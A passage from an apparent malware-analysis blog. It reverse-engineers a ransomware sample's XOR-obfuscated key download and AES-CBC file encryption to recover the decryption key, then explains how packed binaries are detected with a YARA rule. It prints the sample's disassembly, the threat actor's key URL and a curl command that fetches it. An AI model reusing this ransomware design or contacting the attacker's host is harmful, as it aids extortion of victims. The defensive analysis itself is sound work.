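def could_be_cbc_output(ciphertext_length: int) -> bool:
    """True when the length is a positive multiple of the AES block size."""
    return ciphertext_length > 0 and ciphertext_length % AES_BLOCK_SIZE == 0

for size in (0, 15, 16, 100):
    print(size, cbc_padded_length(size))
```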

Before looking further into where the 2 functions mentioned above are used within the malware, let's look at the functions that are exported by the binary by using the iE command.

[0x00001280]> iE
[Exports]
nth paddr      vaddr      bind   type   size lib name                demangled
――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
41  ---------- 0x00005140 GLOBAL OBJ    8        stdout
43  ---------- 0x00005160 GLOBAL OBJ    8        stderr
49  ---------- 0x00005140 GLOBAL OBJ    8        stdout@GLIBC_2.2.5
50  0x00003030 0x00003030 GLOBAL OBJ    19       K2
52  0x00001af3 0x00001af3 GLOBAL FUNC   394      get_key_from_url
53  ---------- 0x00005138 GLOBAL NOTYPE 0        _edata
56  0x00003000 0x00003000 GLOBAL OBJ    4        _IO_stdin_used
58  0x00003050 0x00003050 GLOBAL OBJ    19       K3
62  0x00001787 0x00001787 GLOBAL FUNC   810      main
63  0x00004130 0x00005130 GLOBAL OBJ    8        HESB
66  0x00004128 0x00005128 GLOBAL OBJ    0        __dso_handle
68  0x00001ab1 0x00001ab1 GLOBAL FUNC   66       write_binary_data
69  0x00003070 0x00003070 GLOBAL OBJ    19       K4
72  0x00001c7d 0x00001c7d GLOBAL FUNC   426      handle_directory
73  0x00002064 0x00002064 GLOBAL FUNC   0        _fini
77  0x00003090 0x00003090 GLOBAL OBJ    19       K5
79  0x0000141d 0x0000141d GLOBAL FUNC   140      xor_cipher
80  0x000014a9 0x000014a9 GLOBAL FUNC   58       write_data
81  0x0000161c 0x0000161c GLOBAL FUNC   24       handleErrors
82  0x00001280 0x00001280 GLOBAL FUNC   34       _start
84  0x000014e3 0x000014e3 GLOBAL FUNC   313      download_lyrics
87  0x00001000 0x00001000 GLOBAL FUNC   0        _init
88  ---------- 0x00005138 GLOBAL OBJ    0        __TMC_END__
94  0x0000173d 0x0000173d GLOBAL FUNC   74       encrypt
96  ---------- 0x00005160 GLOBAL OBJ    8        stderr@GLIBC_2.2.5
97  0x00004120 0x00005120 GLOBAL NOTYPE 0        __data_start
98  ---------- 0x00005170 GLOBAL NOTYPE 0        _end
105 ---------- 0x00005138 GLOBAL NOTYPE 0        __bss_start
108 0x00001e27 0x00001e27 GLOBAL FUNC   573      encrypt_file
109 0x00001634 0x00001634 GLOBAL FUNC   265      is_target_extension
115 0x00003010 0x00003010 GLOBAL OBJ    19       K1

Focusing on the lines with the type FUNC, there are 2 functions that appear to be relevant:

The function get_key_from_url (0x1af3) points to a key being obtained from an external source, which could potentially be the encryption key.
The xor_cipher (0x141d) function points to XOR encryption being used in addition to the AES algorithm.

Let's see if there is any relation between the 4 functions that are considered relevant in this binary. The axt command finds the references to a specified address; its syntax is axt followed by the address.

Let's look at the usage of the EVP_aes_256_cbc function. The output shows that the function is called from the sym.encrypt_file function, confirming that it's the encryption algorithm being used to encrypt the files.

[0x00001280]> axt 0x10c0
sym.encrypt_file 0x1f22 [CALL:--x] call sym.imp.EVP_aes_256_cbc

The curl_easy_perform function is called by 2 different functions, with the get_key_from_url being the more relevant one. This confirms that data is being downloaded.

[0x00001280]> axt 0x1190
sym.download_lyrics 0x159f [CALL:--x] call sym.imp.curl_easy_perform
sym.get_key_from_url 0x1bdc [CALL:--x] call sym.imp.curl_easy_perform

The get_key_from_url function is called from the main function.

[0x00001280]> axt 0x1af3
main 0x17c4 [CALL:--x] call sym.get_key_from_url

The xor_cipher function is called four times from main and once from get_key_from_url, which suggests that several pieces of data are encrypted and that at least one of them is used in relation to the key that is downloaded.

[0x00001280]> axt 0x141d
main 0x186c [CALL:--x] call sym.xor_cipher
main 0x18fe [CALL:--x] call sym.xor_cipher
main 0x1990 [CALL:--x] call sym.xor_cipher
main 0x1a22 [CALL:--x] call sym.xor_cipher
sym.get_key_from_url 0x1b45 [CALL:--x] call sym.xor_cipher

The focus now shifts to the get_key_from_url function, in order to determine the URL that the key is obtained from. The first step is to seek to the address where the function starts with the command s 0x1af3, and then print the disassembled function using the pdf command.

[0x00001af3]> pdf
            ; CALL XREF from main @ 0x17c4(x)
┌ 394: sym.get_key_from_url (void *arg1, int64_t arg2);
│           ; arg void *arg1 @ rdi
│           ; arg int64_t arg2 @ rsi
│           ; var uint32_t var_8h @ rbp-0x8
│           ; var int64_t var_ch @ rbp-0xc
│           ; var int64_t var_10h @ rbp-0x10
│           ; var int64_t var_14h @ rbp-0x14
│           ; var int64_t var_18h @ rbp-0x18
│           ; var uint32_t var_1ch @ rbp-0x1c
│           ; var void *s2 @ rbp-0x50
│           ; var int64_t var_90h @ rbp-0x90
│           ; var void *s1 @ rbp-0x98
│           ; var int64_t var_a0h @ rbp-0xa0
│           0x00001af3      55             push rbp
│           0x00001af4      4889e5         mov rbp, rsp
│           0x00001af7      4881eca000..   sub rsp, 0xa0
│           0x00001afe      4889bd68ff..   mov qword [s1], rdi         ; arg1
│           0x00001b05      4889b560ff..   mov qword [var_a0h], rsi    ; arg2
│           0x00001b0c      bf03000000     mov edi, 3
│           0x00001b11      e83af5ffff     call sym.imp.curl_global_init
│           0x00001b16      e865f6ffff     call sym.imp.curl_easy_init
│           0x00001b1b      488945f8       mov qword [var_8h], rax
│           0x00001b1f      48837df800     cmp qword [var_8h], 0
│       ┌─< 0x00001b24      0f840f010000   je 0x1c39
│       │   0x00001b2a      488b15ff35..   mov rdx, qword [obj.HESB]   ; [0x5130:8]=0x30a3 str.b7894532snsmajuys6 ; char *arg3
│       │   0x00001b31      488d8570ff..   lea rax, [var_90h]
│       │   0x00001b38      4889c6         mov rsi, rax                ; int64_t arg2
│       │   0x00001b3b      488d05ce14..   lea rax, obj.K1             ; 0x3010 ; "\nCLIG\x0f\x1c\x1d\x01\f]\n\x18EF\x1f\x1fE\x1b"
│       │   0x00001b42      4889c7         mov rdi, rax                ; char *arg1
│       │   0x00001b45      e8d3f8ffff     call sym.xor_cipher
[..SNIP..]

The function is long, but the first lines already show that data is decrypted as one of the initial steps. Let's break down the information that is seen.

At address 0x1b2a, the value b7894532snsmajuys6 is moved into the rdx register; this would be the key used for the encryption and decryption.
At address 0x1b3b, the memory address of a binary value (obj.K1 at 0x3010) is stored in the rax register and then passed in rdi; this could be the encrypted data.

The binary data is found at the address 0x3010. The px command prints a hex dump of a memory region; the full command is px @ 0x3010, and the screenshot below shows the binary data that is referenced.

To make it easier to handle the binary data, we'll copy the hex bytes, which are 0a434c49470f1c1d010c5d0a1845461f1f451b. CyberChef can be used to decrypt the data with the From Hex and XOR operations, using the value b7894532snsmajuys6 as the key.
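
The same decryption can be sketched in Python. This assumes that xor_cipher is a plain repeating-key XOR, which the disassembly excerpt does not show directly; the xor_decrypt name is illustrative.

```python
from itertools import cycle


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# Hex bytes copied from obj.K1 and the key string referenced by obj.HESB.
encrypted = bytes.fromhex("0a434c49470f1c1d010c5d0a1845461f1f451b")
key = b"b7894532snsmajuys6"

url = xor_decrypt(encrypted, key).decode("ascii")
print(url)  # https://rb.gy/3flsy
```

Because XOR is symmetric, the same function also re-encrypts the plaintext with the same key.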

The encrypted data contained the URL https://rb.gy/3flsy, which means that the key is downloaded from this address.

Reviewing the hex dump above, it appears that there are other URLs that are encrypted, and the CLIG string is a common denominator among them (it is the result of XORing ttps with the key bytes 7894). Decrypting these URLs can be done in the same manner as shown above. They are decoys and don't contain any valuable data, so they are skipped for the purposes of this writeup.

The next step in reviewing the disassembled function is determining how the data is downloaded from the URL. The documentation for the curl_easy_perform function shows that it performs a blocking transfer. In the example, the return code of the transfer is stored in a variable; the downloaded data itself is handed to a write callback, or written to standard output when no callback is set.

#include <curl/curl.h>

int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    CURLcode res;
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com");
    res = curl_easy_perform(curl);
    curl_easy_cleanup(curl);
  }
}

The above code shows that the curl_easy_setopt function is called to configure the curl object, and then the curl_easy_perform function is called to execute the download action.

The following command can be used to download the data to a file named 3flsy.

curl -vLO --url 'https://rb.gy/3flsy'

Checking the file shows that it contains binary data, which can be viewed with xxd.

$ xxd 3flsy
00000000: f3fc 056d a118 5eae 370d 76d4 7c4c f9db  ...m..^.7.v.|L..
00000010: 9f4e fd1c 1585 cde3 a7bc c6cb 5889 f6db  .N..........X...
00000020: 0144 8c79 0993 9e13 ce35 9710 b9f0 dc2e  .D.y.....5......

Decrypting the Files

Now that the key has been obtained, we need to determine how to decrypt the files. Reviewing the available data, the files are encrypted using the AES-256-CBC algorithm, and they can be decrypted using CyberChef.

The AES Decrypt operation can be used to decrypt the files. Before a key is entered, the operation displays relevant information in the output:

Invalid key length: 0 bytes

The following algorithms will be used based on the size of the key: 16 bytes = AES-128 24 bytes = AES-192 32 bytes = AES-256

Knowing that the encryption used is AES-256, the key should have a length of 32 bytes. However, the file has a size of 48 bytes, which means that it contains 16 additional bytes.

AES in CBC mode requires a key and an initialization vector (IV), so it's possible that the downloaded file contains both values. Let's extract the key and IV values from the file with the xxd command.

$ xxd -l 32 -ps 3flsy
f3fc056da1185eae370d76d47c4cf9db9f4efd1c1585cde3a7bcc6cb5889
f6db

$ xxd -s 32 -ps 3flsy
01448c7909939e13ce359710b9f0dc2e

The -l option stops the hex dump after the specified number of bytes. The -s option starts at the specified byte offset instead of starting at 0. The -ps option prints only the hex values, without the offsets or the ASCII column.
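
The split can also be sketched in Python. The layout of key first and IV second is the assumption made in this post, and the split_key_iv name is illustrative.

```python
# Bytes copied from the xxd dump of the downloaded file shown earlier.
blob = bytes.fromhex(
    "f3fc056da1185eae370d76d47c4cf9db"
    "9f4efd1c1585cde3a7bcc6cb5889f6db"
    "01448c7909939e13ce359710b9f0dc2e"
)

KEY_SIZE = 32  # AES-256 key length in bytes
IV_SIZE = 16   # AES block size, which is also the CBC IV length


def split_key_iv(data: bytes):
    """Split the blob, assuming the layout is the key followed by the IV."""
    if len(data) != KEY_SIZE + IV_SIZE:
        raise ValueError(f"expected {KEY_SIZE + IV_SIZE} bytes, got {len(data)}")
    return data[:KEY_SIZE], data[KEY_SIZE:]


key, iv = split_key_iv(blob)
print("key:", key.hex())
print("iv: ", iv.hex())
```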

These values are used in the AES Decrypt recipe in CyberChef, along with the encrypted files.

The encrypted data can now be restored to its original state.

Conclusion

The threat actor has altered their tactics and no longer hard codes all of the necessary information. Instead, part of it is made available through a web service that can be easily altered to change the result of the encryption.

Analyzing Packed Binaries

Sat, 23 Sep 2023 23:17:22 +0000

Packing is a technique used by software developers to reduce the size of executables and to obfuscate machine code with the intention of protecting intellectual property, among other reasons. These are just some of the legitimate uses for implementing this technique on executables and other similar binary files. Malware developers also utilize this technique to prevent their malicious executables from being easily detected and to make analysis more difficult.

The process of packing an executable depends on the intended goal, which could be compression, obfuscation, encryption, or a combination of these techniques. Regardless of the extent of modifications made, the executable's structure is altered to incorporate the essential code for unpacking the machine code in memory during program execution on the user's system. Additionally, it includes the necessary data for the program.

There are both open-source and commercial packers available. These tools often insert strings or name the sections containing the unpacking sequence in a specific manner, which can be used to identify the packer that was used. However, some malware developers may devise their own packing techniques or tools. They may also alter section names or remove the strings added by well-known packers to make it even more challenging for malware analysts to determine which packer was employed.

A packing process typically involves several steps, which can vary depending on the specific tools and the purpose of implementation. The general process encompasses the following stages:

Compression: The original executable undergoes compression using an algorithm to reduce its size.
Encryption: An additional layer of protection is applied using a specific key or algorithm.
Header modification: Changes are made to reflect the alterations and ensure the executable remains valid. This often includes markers for identifying the packer used.
Runtime Decryption/Decompression: Code necessary for extracting the original executable into memory is added to the new file, serving as the new entry point for the program.
Anti-analysis measures: Some packing tools may employ techniques to deter analysis, debugging, or emulation, aiming to hinder the examination of the original code.
Execution flow control: Essential instructions are incorporated to manage the execution flow, ensuring seamless execution of the original code.

Additionally, some packing tools may include extra code to dynamically alter behavior during execution, making it more challenging for an analyst to discern the actions taken by the malware.

Detecting Packing

One important aspect is to determine whether a sample being analyzed is packed or not, since this determines the approach to the analysis of the binary file. While most analysis tools can identify whether the binary is packed and which packing program was used, it remains beneficial to understand how to analyze such files.

Tools capable of detecting packed binaries often rely on signatures, which are patterns or identifying strings inserted by packers and are widely recognized. The following Yara rule can be used to identify binaries packed with RLPack.

rule rlpack {
    meta:
        description = "RLPack packed file"
        block = false
        quarantine = false

    strings:
        $mz = "MZ"
        $text1 = ".packed\x00"
        $text2 = ".RLPack\x00"

    condition:
        $mz at 0 and $text1 in (0..1024) and $text2 in (0..1024)
}
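
To illustrate what the condition of this rule checks, the following Python sketch applies the same three tests to a byte buffer. It is not a replacement for Yara; the looks_like_rlpack name and the synthetic buffers are assumptions used only for illustration.

```python
def looks_like_rlpack(data: bytes, window: int = 1024) -> bool:
    """Mirror the rule's condition: MZ at offset 0 and both section-name
    strings starting at an offset between 0 and `window`, inclusive."""

    def starts_within(needle: bytes) -> bool:
        # The end bound lets a match begin exactly at offset `window`.
        return data.find(needle, 0, window + len(needle)) != -1

    return (
        data.startswith(b"MZ")
        and starts_within(b".packed\x00")
        and starts_within(b".RLPack\x00")
    )


# Synthetic buffers, not real samples.
fake_packed = b"MZ" + b"\x00" * 200 + b".packed\x00" + b"\x00" * 32 + b".RLPack\x00"
fake_plain = b"MZ" + b"\x00" * 200 + b".text\x00\x00\x00"

print(looks_like_rlpack(fake_packed), looks_like_rlpack(fake_plain))
```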

Signatures can be created based on various elements, including section names, header values, structure, and the Import Address Table (IAT) of the binary generated by the packer software. Packers often introduce sections with specific names and characteristics. While some packers only display sections specific to the packer itself, others add the necessary sections to the list of sections that exist in the original binary. While this can assist in identifying the tool used, developers can also change the names of these sections without modifying the packer's code or the resulting binary. Despite the possibility of section name changes, the respective sections and other characteristics remain the same, and this information is used to determine which packer was employed.

Similarly, the header can be analyzed to determine the packer used. While the header's structure may vary depending on the original binary, packers often introduce values or set the header to a specific structure. The section headers specify both the size the data occupies on disk and its size when loaded into memory. A significant difference between these two values can indicate that the data is decompressed or decrypted in memory. For instance, UPX creates a section that has a size of zero on disk but expands in memory to hold the unpacked program, while the compressed data is stored in a second section.

The Import Address Table (IAT) is a structure within the PE header that specifies the list of functions or procedures imported from dynamic link libraries (DLLs). This allows the executable to locate and access the required functions at runtime. ELF binaries use the Procedure Linkage Table (PLT) and Global Offset Table (GOT) to achieve a similar purpose as the IAT in PE files. These structures differ in design and function, but they share the goal of importing functions or procedures from external libraries. Packers have specific functions that they call, which they may do by directly linking to external libraries or by dynamically resolving API calls. As a result, the import tables will have a specific set of functions or procedures listed or may have an incomplete list.

While the aspects mentioned above are considered during static analysis, dynamic analysis is also employed to assess the packing techniques in use. This involves using a debugger and disassembly to identify the instructions and flow of the binary. Dynamic analysis is particularly useful for extracting unpacked code when it resides in memory. It's important to note that the extracted program will require additional steps to become a valid executable on disk for further analysis and won't exactly match the original version of the binary file.

Let's examine an example binary that has been packed using UPX and ASPack to better understand the differences. This example is a Windows PE program that, when executed, displays a message box and performs no other actions.

The source code of this program consists only of the lines shown below; any additional functions and data are added by the compiler. This program was compiled in Microsoft Visual Studio 2022.

#include <windows.h>

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    MessageBox(NULL, L"Hello there! - General Kenobi", L"Star Wars Quote", MB_OK | MB_ICONINFORMATION);
    return 0;
}

For the analysis phase, Radare2 is used, but any other tool can be used to achieve the same results. The original binary file is initially examined to establish a baseline. The sections are displayed using the iS command; the entropy of each section is displayed by adding the parameter entropy to the command.

[Sections]

nth paddr        size vaddr        vsize perm entropy    type name
――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000400  0xe00 0x00401000  0x1000 -r-x 5.92845120 ---- .text
1   0x00001200  0xc00 0x00402000  0x1000 -r-- 4.55813641 ---- .rdata
2   0x00001e00  0x200 0x00403000  0x1000 -rw- 0.28040117 ---- .data
3   0x00002000  0x200 0x00404000  0x1000 -r-- 4.70150326 ---- .rsrc
4   0x00002200  0x200 0x00405000  0x1000 -r-- 4.86675397 ---- .reloc

Several sections are listed. The size column refers to the amount of space the section consumes on disk, while vsize refers to the amount of space that is allocated for the section in memory. The difference between these 2 sizes is small: the sizes on disk range from 512 bytes to 3.5 Kilobytes, while each of the sections is allocated 4 Kilobytes in memory. This is not a big enough difference to point to packing being used.

The entropy indicates the level of randomness that exists in the section, on a scale from 0 to 8 bits per byte. These values will be compared later on when the packed samples are analyzed.
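
As a reference for how such a value can be computed, the following is a minimal Python sketch of the Shannon entropy of a byte sequence. It is assumed to be comparable to the figure that Radare2 reports, though the tool's exact implementation is not verified here.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return sum((n / total) * math.log2(total / n) for n in counts.values())


# A single repeated byte has no randomness at all.
print(shannon_entropy(b"\x00" * 512))
# Every byte value appearing equally often gives the maximum.
print(shannon_entropy(bytes(range(256)) * 2))
```

Compressed or encrypted data tends toward the upper end of the scale, which is why the entropy of a section is a useful packing indicator.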

The linked libraries are listed using the il command. For this program there are only 8 DLLs linked and none are suspicious.

[Linked libraries]
user32.dll
vcruntime140.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll
kernel32.dll

8 libraries

The functions that are imported from these libraries can be listed with the ii command. The only function that was specified in the source code used for this program is MessageBoxW, the other functions are listed because they are used by other parts of the program that get added by the compiler and aren't necessarily used.

[Imports]
nth vaddr      bind type lib                               name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
1   0x00402038 NONE FUNC USER32.dll                        MessageBoxW
1   0x00402040 NONE FUNC VCRUNTIME140.dll                  __current_exception
2   0x00402044 NONE FUNC VCRUNTIME140.dll                  _except_handler4_common
3   0x00402048 NONE FUNC VCRUNTIME140.dll                  __current_exception_context
4   0x0040204c NONE FUNC VCRUNTIME140.dll                  memset
1   0x0040206c NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _crt_atexit
2   0x00402070 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _cexit
3   0x00402074 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll terminate
4   0x00402078 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _register_onexit_function
5   0x0040207c NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _register_thread_local_exe_atexit_callback
6   0x00402080 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _exit
7   0x00402084 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _initterm
8   0x00402088 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _get_narrow_winmain_command_line
9   0x0040208c NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _initialize_narrow_environment
10  0x00402090 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _configure_narrow_argv
11  0x00402094 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _c_exit
12  0x00402098 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _set_app_type
13  0x0040209c NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _seh_filter_exe
14  0x004020a0 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _initialize_onexit_table
15  0x004020a4 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll exit
16  0x004020a8 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _controlfp_s
17  0x004020ac NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _initterm_e
1   0x00402064 NONE FUNC api-ms-win-crt-math-l1-1-0.dll    __setusermatherr
1   0x004020b4 NONE FUNC api-ms-win-crt-stdio-l1-1-0.dll   _set_fmode
2   0x004020b8 NONE FUNC api-ms-win-crt-stdio-l1-1-0.dll   __p__commode
1   0x0040205c NONE FUNC api-ms-win-crt-locale-l1-1-0.dll  _configthreadlocale
1   0x00402054 NONE FUNC api-ms-win-crt-heap-l1-1-0.dll    _set_new_mode
1   0x00402000 NONE FUNC KERNEL32.dll                      GetCurrentProcessId
2   0x00402004 NONE FUNC KERNEL32.dll                      GetModuleHandleW
3   0x00402008 NONE FUNC KERNEL32.dll                      GetStartupInfoW
4   0x0040200c NONE FUNC KERNEL32.dll                      IsDebuggerPresent
5   0x00402010 NONE FUNC KERNEL32.dll                      InitializeSListHead
6   0x00402014 NONE FUNC KERNEL32.dll                      GetSystemTimeAsFileTime
7   0x00402018 NONE FUNC KERNEL32.dll                      GetCurrentThreadId
8   0x0040201c NONE FUNC KERNEL32.dll                      UnhandledExceptionFilter
9   0x00402020 NONE FUNC KERNEL32.dll                      QueryPerformanceCounter
10  0x00402024 NONE FUNC KERNEL32.dll                      IsProcessorFeaturePresent
11  0x00402028 NONE FUNC KERNEL32.dll                      TerminateProcess
12  0x0040202c NONE FUNC KERNEL32.dll                      GetCurrentProcess
13  0x00402030 NONE FUNC KERNEL32.dll                      SetUnhandledExceptionFilter

Looking at the list of functions, there are some that may generate some concern and are often used by malware for different reasons. One of these functions is IsDebuggerPresent, which can be used by malware as an anti-analysis technique. The axt command can be used to check where the function is being called; the address of the function is used as the argument for the command.

[0x00401268]> axt 0x0040200c
fcn.004016fe 0x4017d6 [CALL:--x] call dword [sym.imp.KERNEL32.dll_IsDebuggerPresent]

If this sample were potential malware, it would be necessary to determine what makes the call to this function; however, this is outside of the scope of this blog post.

Loading the sample that is packed with UPX into Radare2 and displaying the sections that the PE binary has shows a very different story.

[Sections]

nth paddr         size vaddr        vsize perm entropy    type name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000400     0x0 0x00401000  0x6000 -rwx            ---- UPX0
1   0x00000400  0x1200 0x00407000  0x2000 -rwx 7.32773884 ---- UPX1
2   0x00001600   0x600 0x00409000  0x1000 -rw- 3.88507214 ---- .rsrc

This program consists of only three sections. Two of these sections, namely UPX0 and UPX1, immediately indicate the packer used.

The UPX0 section has a size of 0 bytes on disk but allocates 24 Kilobytes when loaded into memory. This significant difference raises concerns. Furthermore, this section possesses read, write, and execute permissions, allowing it to be altered during runtime.

The UPX1 section exhibits high entropy compared to the unpacked version, which is unusual. Additionally, it has all permissions, which is not a typical configuration.
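
The size comparison can be sketched in Python with the values copied from the two section tables above. The empty_on_disk name and the rule it applies (no bytes on disk but memory reserved) are illustrative assumptions, not a complete packing detector.

```python
# (name, size on disk, size in memory) copied from the iS output above.
ORIGINAL = [
    (".text", 0xE00, 0x1000),
    (".rdata", 0xC00, 0x1000),
    (".data", 0x200, 0x1000),
    (".rsrc", 0x200, 0x1000),
    (".reloc", 0x200, 0x1000),
]
UPX = [
    ("UPX0", 0x0, 0x6000),
    ("UPX1", 0x1200, 0x2000),
    (".rsrc", 0x600, 0x1000),
]


def empty_on_disk(sections):
    """Return the names of sections that occupy no bytes on disk but reserve memory."""
    return [name for name, raw, virtual in sections if raw == 0 and virtual > 0]


print("original:", empty_on_disk(ORIGINAL))
print("upx:     ", empty_on_disk(UPX))
```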

The libraries that are linked to the executable are the same as the unpacked version.

[Linked libraries]
api-ms-win-crt-heap-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
kernel32.dll
user32.dll
vcruntime140.dll

8 libraries

However, the difference is significant when listing the imported functions. The list is shorter and includes LoadLibraryA, GetProcAddress, VirtualProtect, and ExitProcess, none of which are imported by the unpacked version.

[Imports]
nth vaddr      bind type lib                               name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
1   0x00409290 NONE FUNC api-ms-win-crt-heap-l1-1-0.dll    _set_new_mode
1   0x00409298 NONE FUNC api-ms-win-crt-locale-l1-1-0.dll  _configthreadlocale
1   0x004092a0 NONE FUNC api-ms-win-crt-math-l1-1-0.dll    __setusermatherr
1   0x004092a8 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll exit
1   0x004092b0 NONE FUNC api-ms-win-crt-stdio-l1-1-0.dll   _set_fmode
1   0x004092b8 NONE FUNC KERNEL32.DLL                      LoadLibraryA
2   0x004092bc NONE FUNC KERNEL32.DLL                      ExitProcess
3   0x004092c0 NONE FUNC KERNEL32.DLL                      GetProcAddress
4   0x004092c4 NONE FUNC KERNEL32.DLL                      VirtualProtect
1   0x004092cc NONE FUNC USER32.dll                        MessageBoxW
1   0x004092d4 NONE FUNC VCRUNTIME140.dll                  memset

Checking for references to these functions shows that none exist, meaning that they are most likely being called indirectly or resolved dynamically at runtime.

[0x00407e70]> axt 0x004092b8
[0x00407e70]> axt 0x004092c0
[0x00407e70]> axt 0x004092c4
[0x00407e70]> axt 0x004092cc
[0x00407e70]>

The functions that exist within the binary are listed using the afl command; for the packed version it only shows two functions. Despite the program having only one function in the source code, the unpacked version contains a lot more functions than the packed version does.

0x00407e70   51    439 entry0
0x004071bb    3     37 fcn.004071bb

Checking for where the function named fcn.004071bb is called shows that there is no reference. The entry0 function has several call instructions listed, which isn't uncommon, but can point to areas to analyze further when debugging.

[0x00407e70]> axt 0x004071bb
[0x00407e70]> pdf @ entry0 ~ call
│     │╎╎   0x00407f8a      ff96b8820000   call dword [esi + 0x82b8]
│    ╎│ ╎   0x00407f9f      ff96c0820000   call dword [esi + 0x82c0]
│     │└──> 0x00407fb0      ff96bc820000   call dword [esi + 0x82bc]
│       ╎   0x00407ffe      ffd5           call ebp
│       ╎   0x00408013      ffd5           call ebp
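
The offsets used by the first three call instructions line up with the import addresses listed earlier. The following Python sketch shows the arithmetic under the assumption that esi holds 0x00401000, the virtual address of the UPX0 section; this value is inferred from the numbers and would need to be confirmed in a debugger.

```python
# Import addresses copied from the ii output of the UPX packed sample.
IMPORTS = {
    "LoadLibraryA": 0x004092B8,
    "ExitProcess": 0x004092BC,
    "GetProcAddress": 0x004092C0,
}

# Offsets copied from the call dword [esi + ...] instructions in entry0.
CALL_OFFSETS = [0x82B8, 0x82C0, 0x82BC]

# Assumption: esi holds the UPX0 virtual address when the calls are made.
ASSUMED_ESI = 0x00401000

ADDRESS_TO_NAME = {address: name for name, address in IMPORTS.items()}
resolved = [ADDRESS_TO_NAME.get(ASSUMED_ESI + offset, "unknown") for offset in CALL_OFFSETS]

for offset, name in zip(CALL_OFFSETS, resolved):
    print(f"call dword [esi + {offset:#x}] -> {ASSUMED_ESI + offset:#010x} {name}")
```

If the assumption holds, it would explain why axt finds no references: the calls reach the import table through a register instead of a fixed address.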

Finally, the sample that was packed using ASPack shows a different picture from the UPX sample. Its section table contains the same sections as the original version of the sample, but it adds the .aspack and .adata sections, and the entropy of the .text and .rdata sections is considerably higher than in the original.

[Sections]

nth paddr         size vaddr        vsize perm entropy    type name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000400   0xa00 0x00401000  0x1000 -rwx 7.31497939 ---- .text
1   0x00000e00   0x600 0x00402000  0x1000 -rw- 7.35641437 ---- .rdata
2   0x00001400   0x200 0x00403000  0x1000 -rw- 0.74297410 ---- .data
3   0x00001600   0x200 0x00404000  0x1000 -rw- 0.66525059 ---- .rsrc
4   0x00001800   0x200 0x00405000  0x1000 -rw- 4.86675397 ---- .reloc
5   0x00001a00  0x1400 0x00406000  0x2000 -rwx 6.17277319 ---- .aspack
6   0x00002e00     0x0 0x00408000  0x1000 -rwx            ---- .adata

The linked libraries remain the same 8 that the original version references.

[Linked libraries]
kernel32.dll
user32.dll
vcruntime140.dll
api-ms-win-crt-runtime-l1-1-0.dll
api-ms-win-crt-math-l1-1-0.dll
api-ms-win-crt-stdio-l1-1-0.dll
api-ms-win-crt-locale-l1-1-0.dll
api-ms-win-crt-heap-l1-1-0.dll

8 libraries

However, the list of imported functions is more in line with the UPX packed version. The differences are that it doesn't reference the ExitProcess and VirtualProtect functions and that it adds GetModuleHandleA.

[Imports]
nth vaddr      bind type lib                               name
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
1   0x00406fd0 NONE FUNC kernel32.dll                      GetProcAddress
2   0x00406fd4 NONE FUNC kernel32.dll                      GetModuleHandleA
3   0x00406fd8 NONE FUNC kernel32.dll                      LoadLibraryA
1   0x00407191 NONE FUNC user32.dll                        MessageBoxW
1   0x00407199 NONE FUNC vcruntime140.dll                  __current_exception
1   0x004071a1 NONE FUNC api-ms-win-crt-runtime-l1-1-0.dll _crt_atexit
1   0x004071a9 NONE FUNC api-ms-win-crt-math-l1-1-0.dll    __setusermatherr
1   0x004071b1 NONE FUNC api-ms-win-crt-stdio-l1-1-0.dll   _set_fmode
1   0x004071b9 NONE FUNC api-ms-win-crt-locale-l1-1-0.dll  _configthreadlocale
1   0x004071c1 NONE FUNC api-ms-win-crt-heap-l1-1-0.dll    _set_new_mode

Checking the list of functions, it does appear to contain more functions than the UPX packed version.

0x00406001    1     11 entry0
0x00406014    9    118 fcn.00406014
0x004066e0    5    106 fcn.004066e0
0x00406a9c    3    126 fcn.00406a9c
0x00406d0a    1     14 fcn.00406d0a
0x00406827    1     37 fcn.00406827
0x00406b1a    1     97 fcn.00406b1a
0x00406b7b   33    399 fcn.00406b7b
0x00406d18   29    664 fcn.00406d18
0x004067bc    5    107 fcn.004067bc
0x0040684c   15    380 fcn.0040684c
0x004069c8   14    212 fcn.004069c8

